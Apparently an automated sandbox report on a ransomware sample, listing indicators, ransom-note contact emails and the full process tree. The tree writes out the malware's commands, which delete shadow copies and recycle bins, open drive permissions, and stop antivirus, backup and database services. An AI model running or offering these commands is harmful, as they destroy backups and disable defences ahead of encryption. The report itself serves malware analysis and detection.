Analysis
-
max time kernel
83s -
max time network
112s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-02-2021 19:36
Static task
static1
Behavioral task
behavioral1
Sample
bbc[1].exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
bbc[1].exe
Resource
win10v20201028
General
-
Target
bbc[1].exe
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
workplus111@protonmail.com
worker400@airmail.cc
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
workplus111@protonmail.com
worker400@airmail.cc
Signatures
-
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
-
Executes dropped EXE 1 IoCs
Processes:
tm94ra6g.exepid process 2828 tm94ra6g.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
tm94ra6g.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConnectRename.raw => C:\Users\Admin\Pictures\ConnectRename.raw.fsvlf4 tm94ra6g.exe File renamed C:\Users\Admin\Pictures\DisableRequest.raw => C:\Users\Admin\Pictures\DisableRequest.raw.fsvlf4 tm94ra6g.exe File renamed C:\Users\Admin\Pictures\ExitSkip.raw => C:\Users\Admin\Pictures\ExitSkip.raw.fsvlf4 tm94ra6g.exe File opened for modification C:\Users\Admin\Pictures\SelectClose.tiff tm94ra6g.exe File renamed C:\Users\Admin\Pictures\SelectClose.tiff => C:\Users\Admin\Pictures\SelectClose.tiff.fsvlf4 tm94ra6g.exe -
Drops startup file 1 IoCs
Processes:
tm94ra6g.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk tm94ra6g.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 7372 icacls.exe 7336 icacls.exe 7288 icacls.exe -
Processes:
tm94ra6g.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features tm94ra6g.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" tm94ra6g.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 7152 taskkill.exe 6808 taskkill.exe 7324 taskkill.exe 7060 taskkill.exe 6920 taskkill.exe 6888 taskkill.exe 9188 taskkill.exe 9148 taskkill.exe 9280 taskkill.exe 9236 taskkill.exe 9108 taskkill.exe 9028 taskkill.exe 9124 taskkill.exe 9116 taskkill.exe 9172 taskkill.exe 9156 taskkill.exe 9132 taskkill.exe 9092 taskkill.exe 9084 taskkill.exe 9076 taskkill.exe 9256 taskkill.exe 5764 taskkill.exe 9012 taskkill.exe 5852 taskkill.exe 9180 taskkill.exe 9068 taskkill.exe 9220 taskkill.exe 7404 taskkill.exe 7028 taskkill.exe 9036 taskkill.exe 7448 taskkill.exe 7364 taskkill.exe 9196 taskkill.exe 2032 taskkill.exe 9244 taskkill.exe 6996 taskkill.exe 6964 taskkill.exe 6840 taskkill.exe 9164 taskkill.exe 9264 taskkill.exe 9228 taskkill.exe 7276 taskkill.exe 7124 taskkill.exe 9204 taskkill.exe 9052 taskkill.exe 9044 taskkill.exe 6956 taskkill.exe 9272 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 13156 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tm94ra6g.exepid process 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe 2828 tm94ra6g.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
tm94ra6g.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2828 tm94ra6g.exe Token: SeDebugPrivilege 3592 powershell.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 9012 taskkill.exe Token: SeDebugPrivilege 5764 taskkill.exe Token: SeDebugPrivilege 9108 taskkill.exe Token: SeDebugPrivilege 9124 taskkill.exe Token: SeDebugPrivilege 9236 taskkill.exe Token: SeDebugPrivilege 6808 taskkill.exe Token: SeDebugPrivilege 9084 taskkill.exe Token: SeDebugPrivilege 5852 taskkill.exe Token: SeDebugPrivilege 6920 taskkill.exe Token: SeDebugPrivilege 9036 taskkill.exe Token: SeDebugPrivilege 7404 taskkill.exe Token: SeDebugPrivilege 9228 taskkill.exe Token: SeDebugPrivilege 6956 taskkill.exe Token: SeDebugPrivilege 7060 taskkill.exe Token: SeDebugPrivilege 7364 taskkill.exe Token: SeDebugPrivilege 7276 taskkill.exe Token: SeDebugPrivilege 9172 taskkill.exe Token: SeDebugPrivilege 9164 taskkill.exe Token: SeDebugPrivilege 9188 taskkill.exe Token: SeDebugPrivilege 9052 taskkill.exe Token: SeDebugPrivilege 9180 taskkill.exe Token: SeDebugPrivilege 7152 taskkill.exe Token: SeDebugPrivilege 9196 taskkill.exe Token: SeDebugPrivilege 9076 taskkill.exe Token: SeDebugPrivilege 9044 taskkill.exe Token: SeDebugPrivilege 9244 taskkill.exe Token: SeDebugPrivilege 9132 taskkill.exe Token: SeDebugPrivilege 9068 taskkill.exe Token: SeDebugPrivilege 7028 taskkill.exe Token: SeDebugPrivilege 9280 taskkill.exe Token: SeDebugPrivilege 9028 taskkill.exe Token: SeDebugPrivilege 7448 taskkill.exe Token: SeDebugPrivilege 9116 taskkill.exe Token: SeDebugPrivilege 6888 taskkill.exe Token: SeDebugPrivilege 9156 taskkill.exe Token: SeDebugPrivilege 9264 taskkill.exe Token: SeDebugPrivilege 9272 taskkill.exe Token: SeDebugPrivilege 6964 taskkill.exe Token: SeDebugPrivilege 7324 taskkill.exe Token: SeDebugPrivilege 7124 taskkill.exe Token: SeDebugPrivilege 9092 taskkill.exe Token: SeDebugPrivilege 6840 taskkill.exe Token: SeDebugPrivilege 9256 taskkill.exe Token: SeDebugPrivilege 9148 taskkill.exe Token: SeDebugPrivilege 9220 taskkill.exe Token: SeDebugPrivilege 6996 taskkill.exe Token: SeDebugPrivilege 8932 powershell.exe Token: SeDebugPrivilege 7068 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
tm94ra6g.exepid process 2828 tm94ra6g.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
tm94ra6g.exepid process 2828 tm94ra6g.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bbc[1].exetm94ra6g.exedescription pid process target process PID 4048 wrote to memory of 2828 4048 bbc[1].exe tm94ra6g.exe PID 4048 wrote to memory of 2828 4048 bbc[1].exe tm94ra6g.exe PID 4048 wrote to memory of 2828 4048 bbc[1].exe tm94ra6g.exe PID 2828 wrote to memory of 3592 2828 tm94ra6g.exe powershell.exe PID 2828 wrote to memory of 3592 2828 tm94ra6g.exe powershell.exe PID 2828 wrote to memory of 3592 2828 tm94ra6g.exe powershell.exe PID 2828 wrote to memory of 2032 2828 tm94ra6g.exe taskkill.exe PID 2828 wrote to memory of 2032 2828 tm94ra6g.exe taskkill.exe PID 2828 wrote to memory of 2032 2828 tm94ra6g.exe taskkill.exe PID 2828 wrote to memory of 2100 2828 tm94ra6g.exe reg.exe PID 2828 wrote to memory of 2100 2828 tm94ra6g.exe reg.exe PID 2828 wrote to memory of 2100 2828 tm94ra6g.exe reg.exe PID 2828 wrote to memory of 1096 2828 tm94ra6g.exe reg.exe PID 2828 wrote to memory of 1096 2828 tm94ra6g.exe reg.exe PID 2828 wrote to memory of 1096 2828 tm94ra6g.exe reg.exe PID 2828 wrote to memory of 908 2828 tm94ra6g.exe schtasks.exe PID 2828 wrote to memory of 908 2828 tm94ra6g.exe schtasks.exe PID 2828 wrote to memory of 908 2828 tm94ra6g.exe schtasks.exe PID 2828 wrote to memory of 3096 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3096 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3096 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 1892 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 1892 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 1892 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3964 2828 tm94ra6g.exe cmd.exe PID 2828 wrote to memory of 3964 2828 tm94ra6g.exe cmd.exe PID 2828 wrote to memory of 3964 2828 tm94ra6g.exe cmd.exe PID 2828 wrote to memory of 3848 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3848 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3848 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3928 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3928 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3928 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 1508 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 1508 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 1508 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 2640 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 2640 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 2640 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 4064 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 4064 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 4064 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3192 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3192 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3192 2828 tm94ra6g.exe sc.exe PID 2828 wrote to memory of 3960 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 3960 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 3960 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 1544 2828 tm94ra6g.exe cmd.exe PID 2828 wrote to memory of 1544 2828 tm94ra6g.exe cmd.exe PID 2828 wrote to memory of 1544 2828 tm94ra6g.exe cmd.exe PID 2828 wrote to memory of 3824 2828 tm94ra6g.exe netsh.exe PID 2828 wrote to memory of 3824 2828 tm94ra6g.exe netsh.exe PID 2828 wrote to memory of 3824 2828 tm94ra6g.exe netsh.exe PID 2828 wrote to memory of 2260 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 2260 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 2260 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 2576 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 2576 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 2576 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 3616 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 3616 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 3616 2828 tm94ra6g.exe net.exe PID 2828 wrote to memory of 1732 2828 tm94ra6g.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
tm94ra6g.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" tm94ra6g.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" tm94ra6g.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bbc[1].exe"C:\Users\Admin\AppData\Local\Temp\bbc[1].exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe"C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled3⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y4⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y4⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y4⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y4⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y4⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
